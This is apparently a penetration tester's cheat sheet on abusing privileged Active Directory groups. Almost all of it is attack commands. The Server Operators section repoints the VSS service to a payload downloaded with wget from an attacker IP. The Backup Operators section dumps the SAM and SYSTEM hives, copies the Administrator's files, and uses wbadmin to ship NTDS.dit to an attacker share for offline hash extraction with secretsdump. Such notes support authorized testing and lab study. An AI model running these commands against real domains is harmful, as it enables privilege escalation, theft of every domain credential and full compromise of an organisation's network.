########
AD Group
########

| https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/privileged-accounts-and-token-privileges
| https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges

| Interesting groups to look for :

.. code-block::

    AD Recycle Bin
    Backup Operators
    DnsAdmins
    Exchange Windows Permissions
    Hyper-V Administrators

    # Organization Management
    Print Operators
    Remote Desktop Users
    Remote Management Users
    Server Operators


Server Operators
****************

| You can edit services

.. code-block:: powershell

    # Let's modify the VSS service (Volume Shadow Copy)
    sc.exe qc "vss"
    sc.exe config vss binPath="C:\r\r32.exe"
    sc.exe qc "vss"

    # Retrieve your payload (you need to detach before the service fail to start, or just pick a payload that add a new admin)
    mkdir c:\r
    wget http://10.10.14.139/r32.exe -O c:\r\r32.exe

    # Restart VSS service
    sc.exe stop vss
    sc.exe start vss

    # Cleanup 
    sc.exe config vss binPath="C:\Windows\system32\vssvc.exe"

|

Backup Operators
****************

| You can backup files, including Hives and NTDS.dit,
| If you want other files then you can use robocopy

.. code-block:: powershell

    mkdir c:\r
    robocopy /b C:\Users\Administrator\Desktop\ C:\r\

|

| Dumping Hives

.. code-block:: powershell

    mkdir c:\r
    reg save hklm\sam c:\r\SAM
    reg save hklm\system c:\r\SYSTEM

|

| Dumping NTDS.dit with wbadmin
| First you need a SAMBA share (or a real windows share, but don't use impacket smbserver)
| Instructions here : https://offensive.run/rogue/smb/README.html

.. code-block:: powershell

    net use X: \\ATTACKERIP\PWN
    wbadmin start backup -backuptarget:\\ATTACKERIP\PWN -include:c:\windows\ntds

| We can now open the vhdx file on linux using qemu

.. code-block:: bash

  sudo apt install qemu-utils nbd-client
  sudo apt install nbd-client # install nbd client
  sudo rmmod nbd;sudo modprobe nbd max_part=16  # load the nbd kernel module (it's normal to get errors on rmmod)
  sudo qemu-nbd -c /dev/nbd0 "/tmp/PWN/WindowsImageBackup/DC01/Backup 2024-07-24 233333/6cd5140b-0000-0000-0000-602200000000.vhdx" # mount block device
  sudo partprobe /dev/nbd0 # reload partition table
  mkdir /tmp/vhdx
  sudo mount -o ro,nouser /dev/nbd0p2 "/tmp/vhdx" # mount partition

  # ls -ltrh /tmp/vhdx/Windows/NTDS/ntds.dit
  # -rwxrwxrwx 1 root root 18M juil. 25  2024 /tmp/vhdx/Windows/NTDS/ntds.dit
  # secretsdump.py -sam /tmp/SAM -system /tmp/SYSTEM local -ntds /tmp/vhdx/Windows/NTDS/ntds.dit -history

|